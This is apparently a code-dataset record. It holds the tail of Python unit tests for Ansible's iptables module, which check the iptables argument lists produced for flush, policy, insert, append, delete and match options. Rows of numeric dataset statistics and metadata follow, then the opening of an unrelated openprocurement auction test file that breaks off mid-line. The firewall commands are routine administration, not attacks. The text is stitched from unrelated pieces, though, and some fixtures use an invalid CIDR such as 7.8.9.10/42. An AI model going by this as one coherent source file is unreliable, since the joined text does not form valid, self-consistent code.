self.mock_get_bin_path.start()
self.addCleanup(self.mock_get_bin_path.stop) # ensure that the patching is 'undone'
self.mock_get_iptables_version = patch.object(iptables, 'get_iptables_version', get_iptables_version)
self.mock_get_iptables_version.start()
self.addCleanup(self.mock_get_iptables_version.stop) # ensure that the patching is 'undone'
def test_without_required_parameters(self):
"""Failure must occurs when all parameters are missing"""
with self.assertRaises(AnsibleFailJson):
set_module_args({})
iptables.main()
def test_flush_table_without_chain(self):
"""Test flush without chain, flush the table"""
set_module_args({
'flush': True,
})
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.return_value = 0, '', '' # successful execution, no output
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args[0][0][0], '/sbin/iptables')
self.assertEqual(run_command.call_args[0][0][1], '-t')
self.assertEqual(run_command.call_args[0][0][2], 'filter')
self.assertEqual(run_command.call_args[0][0][3], '-F')
def test_flush_table_check_true(self):
"""Test flush without parameters and check == true"""
set_module_args({
'flush': True,
'_ansible_check_mode': True,
})
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.return_value = 0, '', '' # successful execution, no output
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 0)
# TODO ADD test flush table nat
# TODO ADD test flush with chain
# TODO ADD test flush with chain and table nat
def test_policy_table(self):
"""Test change policy of a chain"""
set_module_args({
'policy': 'ACCEPT',
'chain': 'INPUT',
})
commands_results = [
(0, 'Chain INPUT (policy DROP)\n', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-L',
'INPUT',
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-P',
'INPUT',
'ACCEPT',
])
def test_policy_table_no_change(self):
"""Test don't change policy of a chain if the policy is right"""
set_module_args({
'policy': 'ACCEPT',
'chain': 'INPUT',
})
commands_results = [
(0, 'Chain INPUT (policy ACCEPT)\n', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertFalse(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-L',
'INPUT',
])
def test_policy_table_changed_false(self):
"""Test flush without parameters and change == false"""
set_module_args({
'policy': 'ACCEPT',
'chain': 'INPUT',
'_ansible_check_mode': True,
})
commands_results = [
(0, 'Chain INPUT (policy DROP)\n', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-L',
'INPUT',
])
# TODO ADD test policy without chain fail
# TODO ADD test policy with chain don't exists
# TODO ADD test policy with wrong choice fail
def test_insert_rule_change_false(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'OUTPUT',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'ACCEPT',
'action': 'insert',
'_ansible_check_mode': True,
})
commands_results = [
(1, '', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'OUTPUT',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'ACCEPT'
])
def test_insert_rule(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'OUTPUT',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'ACCEPT',
'action': 'insert'
})
commands_results = [
(1, '', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
# import pdb
# pdb.set_trace()
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'OUTPUT',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'ACCEPT'
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-I',
'OUTPUT',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'ACCEPT'
])
def test_append_rule_check_mode(self):
"""Test append a redirection rule in check mode"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'REDIRECT',
'table': 'nat',
'to_destination': '5.5.5.5/32',
'protocol': 'udp',
'destination_port': '22',
'to_ports': '8600',
'_ansible_check_mode': True,
})
commands_results = [
(1, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'REDIRECT',
'--to-destination',
'5.5.5.5/32',
'--destination-port',
'22',
'--to-ports',
'8600'
])
def test_append_rule(self):
"""Test append a redirection rule"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'REDIRECT',
'table': 'nat',
'to_destination': '5.5.5.5/32',
'protocol': 'udp',
'destination_port': '22',
'to_ports': '8600'
})
commands_results = [
(1, '', ''),
(0, '', '')
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'REDIRECT',
'--to-destination',
'5.5.5.5/32',
'--destination-port',
'22',
'--to-ports',
'8600'
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-A',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'REDIRECT',
'--to-destination',
'5.5.5.5/32',
'--destination-port',
'22',
'--to-ports',
'8600'
])
def test_remove_rule(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'SNAT',
'table': 'nat',
'to_source': '5.5.5.5/32',
'protocol': 'udp',
'source_port': '22',
'to_ports': '8600',
'state': 'absent',
'in_interface': 'eth0',
'out_interface': 'eth1',
'comment': 'this is a comment'
})
commands_results = [
(0, '', ''),
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 2)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'SNAT',
'--to-source',
'5.5.5.5/32',
'-i',
'eth0',
'-o',
'eth1',
'--source-port',
'22',
'--to-ports',
'8600',
'-m',
'comment',
'--comment',
'this is a comment'
])
self.assertEqual(run_command.call_args_list[1][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-D',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'SNAT',
'--to-source',
'5.5.5.5/32',
'-i',
'eth0',
'-o',
'eth1',
'--source-port',
'22',
'--to-ports',
'8600',
'-m',
'comment',
'--comment',
'this is a comment'
])
def test_remove_rule_check_mode(self):
"""Test flush without parameters check mode"""
set_module_args({
'chain': 'PREROUTING',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'SNAT',
'table': 'nat',
'to_source': '5.5.5.5/32',
'protocol': 'udp',
'source_port': '22',
'to_ports': '8600',
'state': 'absent',
'in_interface': 'eth0',
'out_interface': 'eth1',
'comment': 'this is a comment',
'_ansible_check_mode': True,
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'nat',
'-C',
'PREROUTING',
'-p',
'udp',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'SNAT',
'--to-source',
'5.5.5.5/32',
'-i',
'eth0',
'-o',
'eth1',
'--source-port',
'22',
'--to-ports',
'8600',
'-m',
'comment',
'--comment',
'this is a comment'
])
def test_insert_with_reject(self):
""" Using reject_with with a previously defined jump: REJECT results in two Jump statements #18988 """
set_module_args({
'chain': 'INPUT',
'protocol': 'tcp',
'reject_with': 'tcp-reset',
'ip_version': 'ipv4',
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-p',
'tcp',
'-j',
'REJECT',
'--reject-with',
'tcp-reset',
])
def test_insert_jump_reject_with_reject(self):
""" Using reject_with with a previously defined jump: REJECT results in two Jump statements #18988 """
set_module_args({
'chain': 'INPUT',
'protocol': 'tcp',
'jump': 'REJECT',
'reject_with': 'tcp-reset',
'ip_version': 'ipv4',
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-p',
'tcp',
'-j',
'REJECT',
'--reject-with',
'tcp-reset',
])
def test_jump_tee_gateway_negative(self):
""" Missing gateway when JUMP is set to TEE """
set_module_args({
'table': 'mangle',
'chain': 'PREROUTING',
'in_interface': 'eth0',
'protocol': 'udp',
'match': 'state',
'jump': 'TEE',
'ctstate': ['NEW'],
'destination_port': '9521',
'destination': '127.0.0.1'
})
with self.assertRaises(AnsibleFailJson) as e:
iptables.main()
self.assertTrue(e.exception.args[0]['failed'])
self.assertEqual(e.exception.args[0]['msg'], 'jump is TEE but all of the following are missing: gateway')
def test_jump_tee_gateway(self):
""" Using gateway when JUMP is set to TEE """
set_module_args({
'table': 'mangle',
'chain': 'PREROUTING',
'in_interface': 'eth0',
'protocol': 'udp',
'match': 'state',
'jump': 'TEE',
'ctstate': ['NEW'],
'destination_port': '9521',
'gateway': '192.168.10.1',
'destination': '127.0.0.1'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t', 'mangle',
'-C', 'PREROUTING',
'-p', 'udp',
'-d', '127.0.0.1',
'-m', 'state',
'-j', 'TEE',
'--gateway', '192.168.10.1',
'-i', 'eth0',
'--destination-port', '9521',
'--state', 'NEW'
])
def test_tcp_flags(self):
""" Test various ways of inputting tcp_flags """
args = [
{
'chain': 'OUTPUT',
'protocol': 'tcp',
'jump': 'DROP',
'tcp_flags': 'flags=ALL flags_set="ACK,RST,SYN,FIN"'
},
{
'chain': 'OUTPUT',
'protocol': 'tcp',
'jump': 'DROP',
'tcp_flags': {
'flags': 'ALL',
'flags_set': 'ACK,RST,SYN,FIN'
}
},
{
'chain': 'OUTPUT',
'protocol': 'tcp',
'jump': 'DROP',
'tcp_flags': {
'flags': ['ALL'],
'flags_set': ['ACK', 'RST', 'SYN', 'FIN']
}
},
]
for item in args:
set_module_args(item)
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'OUTPUT',
'-p',
'tcp',
'--tcp-flags',
'ALL',
'ACK,RST,SYN,FIN',
'-j',
'DROP'
])
def test_log_level(self):
""" Test various ways of log level flag """
log_levels = ['0', '1', '2', '3', '4', '5', '6', '7',
'emerg', 'alert', 'crit', 'error', 'warning', 'notice', 'info', 'debug']
for log_lvl in log_levels:
set_module_args({
'chain': 'INPUT',
'jump': 'LOG',
'log_level': log_lvl,
'source': '1.2.3.4/32',
'log_prefix': '** DROP-this_ip **'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t', 'filter',
'-C', 'INPUT',
'-s', '1.2.3.4/32',
'-j', 'LOG',
'--log-prefix', '** DROP-this_ip **',
'--log-level', log_lvl
])
def test_iprange(self):
""" Test iprange module with its flags src_range and dst_range """
set_module_args({
'chain': 'INPUT',
'match': ['iprange'],
'src_range': '192.168.1.100-192.168.1.199',
'jump': 'ACCEPT'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-m',
'iprange',
'-j',
'ACCEPT',
'--src-range',
'192.168.1.100-192.168.1.199',
])
set_module_args({
'chain': 'INPUT',
'src_range': '192.168.1.100-192.168.1.199',
'dst_range': '10.0.0.50-10.0.0.100',
'jump': 'ACCEPT'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-j',
'ACCEPT',
'-m',
'iprange',
'--src-range',
'192.168.1.100-192.168.1.199',
'--dst-range',
'10.0.0.50-10.0.0.100'
])
set_module_args({
'chain': 'INPUT',
'dst_range': '10.0.0.50-10.0.0.100',
'jump': 'ACCEPT'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-j',
'ACCEPT',
'-m',
'iprange',
'--dst-range',
'10.0.0.50-10.0.0.100'
])
def test_insert_rule_with_wait(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'OUTPUT',
'source': '1.2.3.4/32',
'destination': '7.8.9.10/42',
'jump': 'ACCEPT',
'action': 'insert',
'wait': '10'
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'OUTPUT',
'-w',
'10',
'-s',
'1.2.3.4/32',
'-d',
'7.8.9.10/42',
'-j',
'ACCEPT'
])
def test_comment_position_at_end(self):
"""Test flush without parameters"""
set_module_args({
'chain': 'INPUT',
'jump': 'ACCEPT',
'action': 'insert',
'ctstate': ['NEW'],
'comment': 'this is a comment',
'_ansible_check_mode': True,
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t',
'filter',
'-C',
'INPUT',
'-j',
'ACCEPT',
'-m',
'conntrack',
'--ctstate',
'NEW',
'-m',
'comment',
'--comment',
'this is a comment'
])
self.assertEqual(run_command.call_args[0][0][14], 'this is a comment')
def test_destination_ports(self):
""" Test multiport module usage with multiple ports """
set_module_args({
'chain': 'INPUT',
'protocol': 'tcp',
'in_interface': 'eth0',
'source': '192.168.0.1/32',
'destination_ports': ['80', '443', '8081:8085'],
'jump': 'ACCEPT',
'comment': 'this is a comment',
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t', 'filter',
'-C', 'INPUT',
'-p', 'tcp',
'-s', '192.168.0.1/32',
'-j', 'ACCEPT',
'-m', 'multiport',
'--dports', '80,443,8081:8085',
'-i', 'eth0',
'-m', 'comment',
'--comment', 'this is a comment'
])
def test_match_set(self):
""" Test match_set together with match_set_flags """
set_module_args({
'chain': 'INPUT',
'protocol': 'tcp',
'match_set': 'admin_hosts',
'match_set_flags': 'src',
'destination_port': '22',
'jump': 'ACCEPT',
'comment': 'this is a comment',
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t', 'filter',
'-C', 'INPUT',
'-p', 'tcp',
'-j', 'ACCEPT',
'--destination-port', '22',
'-m', 'set',
'--match-set', 'admin_hosts', 'src',
'-m', 'comment',
'--comment', 'this is a comment'
])
set_module_args({
'chain': 'INPUT',
'protocol': 'udp',
'match_set': 'banned_hosts',
'match_set_flags': 'src,dst',
'jump': 'REJECT',
})
commands_results = [
(0, '', ''),
]
with patch.object(basic.AnsibleModule, 'run_command') as run_command:
run_command.side_effect = commands_results
with self.assertRaises(AnsibleExitJson) as result:
iptables.main()
self.assertTrue(result.exception.args[0]['changed'])
self.assertEqual(run_command.call_count, 1)
self.assertEqual(run_command.call_args_list[0][0][0], [
'/sbin/iptables',
'-t', 'filter',
'-C', 'INPUT',
'-p', 'udp',
'-j', 'REJECT',
'-m', 'set',
'--match-set', 'banned_hosts', 'src,dst'
])
| 31.027478
| 113
| 0.466015
| 3,125
| 31,617
| 4.54528
| 0.07744
| 0.089411
| 0.069699
| 0.096804
| 0.848916
| 0.805337
| 0.780484
| 0.761194
| 0.749507
| 0.743593
| 0
| 0.041048
| 0.38435
| 31,617
| 1,018
| 114
| 31.057957
| 0.688672
| 0.049404
| 0
| 0.835991
| 0
| 0
| 0.180803
| 0.004513
| 0
| 0
| 0
| 0.000982
| 0.121868
| 1
| 0.029613
| false
| 0
| 0.005695
| 0.002278
| 0.038724
| 0.001139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cfb936b0868b4385bbf65d371ab8d34cedabade
| 43,928
|
py
|
Python
|
openprocurement/auctions/flash/tests/auction.py
|
openprocurement/openprocurement.auctions.flash
|
29d6b9e558cda9d050592136488c00e20bfa37dd
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/flash/tests/auction.py
|
openprocurement/openprocurement.auctions.flash
|
29d6b9e558cda9d050592136488c00e20bfa37dd
|
[
"Apache-2.0"
] | 53
|
2016-07-05T11:46:16.000Z
|
2019-02-20T12:12:14.000Z
|
openprocurement/auctions/flash/tests/auction.py
|
openprocurement/openprocurement.auctions.flash
|
29d6b9e558cda9d050592136488c00e20bfa37dd
|
[
"Apache-2.0"
] | 11
|
2016-07-05T11:14:09.000Z
|
2018-05-30T07:10:37.000Z
|
# -*- coding: utf-8 -*-
import unittest
from openprocurement.auctions.core.tests.base import snitch
from openprocurement.auctions.core.tests.auctions import (
AuctionAuctionResourceTestMixin,
AuctionLotAuctionResourceTestMixin,
)
from openprocurement.auctions.core.tests.blanks.auction_blanks import (
post_auction_auction_not_changed,
post_auction_auction_reversed,
get_auction_features_auction,
)
from openprocurement.auctions.flash.tests.base import (
BaseAuctionWebTest,
test_features_auction_data,
test_bids,
test_lots,
test_organization)
from openprocurement.auctions.flash.tests.blanks.auction_blanks import (
post_auction_auction,
# FlashAuctionBridgePeriodPatch
set_auction_period,
reset_auction_period
)
class AuctionAuctionResourceTest(
BaseAuctionWebTest,
AuctionAuctionResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_bids
test_post_auction_auction = snitch(post_auction_auction)
class AuctionSameValueAuctionResourceTest(BaseAuctionWebTest):
initial_status = 'active.auction'
initial_bids = [
{
"tenderers": [
test_organization
],
"value": {
"amount": 469,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
for i in range(3)
]
test_post_auction_auction_not_changed = snitch(
post_auction_auction_not_changed)
test_post_auction_auction_reversed = snitch(post_auction_auction_reversed)
class AuctionLotAuctionResourceTest(
BaseAuctionWebTest,
AuctionLotAuctionResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_bids
initial_lots = test_lots
def test_get_auction_auction(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get(
'/auctions/{}/auction'.format(self.auction_id), status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't get auction info in current (active.tendering) auction status")
self.set_status('active.auction')
response = self.app.get('/auctions/{}/auction'.format(self.auction_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertNotEqual(auction, self.initial_data)
self.assertIn('dateModified', auction)
self.assertIn('minimalStep', auction)
self.assertIn('lots', auction)
self.assertNotIn("procuringEntity", auction)
self.assertNotIn("tenderers", auction["bids"][0])
self.assertEqual(
auction["bids"][0]['lotValues'][0]['value']['amount'],
self.initial_bids[0]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["bids"][1]['lotValues'][0]['value']['amount'],
self.initial_bids[1]['lotValues'][0]['value']['amount'])
self.set_status('active.qualification')
response = self.app.get(
'/auctions/{}/auction'.format(self.auction_id), status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't get auction info in current (active.qualification) auction status")
def test_post_auction_auction(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't report auction results in current (active.tendering) auction status")
self.set_status('active.auction')
response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {
'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': {
u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
patch_data = {
'bids': [
{
"id": self.initial_bids[1]['id'],
'lotValues': [
{
"value": {
"amount": 419,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
]
}
]
}
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Number of auction results did not match the number of auction bids")
patch_data['bids'].append({
'lotValues': [
{
"value": {
"amount": 409,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
]
})
patch_data['bids'][1]['id'] = "some_id"
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], {
u'id': [u'Hash value is wrong length.']})
patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Auction bids should be identical to the auction bids")
patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
for lot in self.initial_lots:
response = self.app.post_json(
'/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertNotEqual(
auction["bids"][0]['lotValues'][0]['value']['amount'],
self.initial_bids[0]['lotValues'][0]['value']['amount'])
self.assertNotEqual(
auction["bids"][1]['lotValues'][0]['value']['amount'],
self.initial_bids[1]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["bids"][0]['lotValues'][0]['value']['amount'],
patch_data["bids"][1]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["bids"][1]['lotValues'][0]['value']['amount'],
patch_data["bids"][0]['lotValues'][0]['value']['amount'])
self.assertEqual('active.qualification', auction["status"])
self.assertIn("tenderers", auction["bids"][0])
self.assertIn("name", auction["bids"][0]["tenderers"][0])
# self.assertIn(auction["awards"][0]["id"], response.headers['Location'])
self.assertEqual(
auction["awards"][0]['bid_id'],
patch_data["bids"][0]['id'])
self.assertEqual(
auction["awards"][0]['value']['amount'],
patch_data["bids"][0]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["awards"][0]['suppliers'],
self.initial_bids[0]['tenderers'])
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't report auction results in current (active.qualification) auction status")
def test_patch_auction_auction(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't update auction urls in current (active.tendering) auction status")
self.set_status('active.auction')
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json(
'/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.patch_json('/auctions/{}/auction'.format(self.auction_id), {
'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': {
u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
patch_data = {
'auctionUrl': u'http://auction-sandbox.openprocurement.org/auctions/{}'.format(
self.auction_id),
'bids': [
{
"id": self.initial_bids[1]['id'],
"participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
self.auction_id,
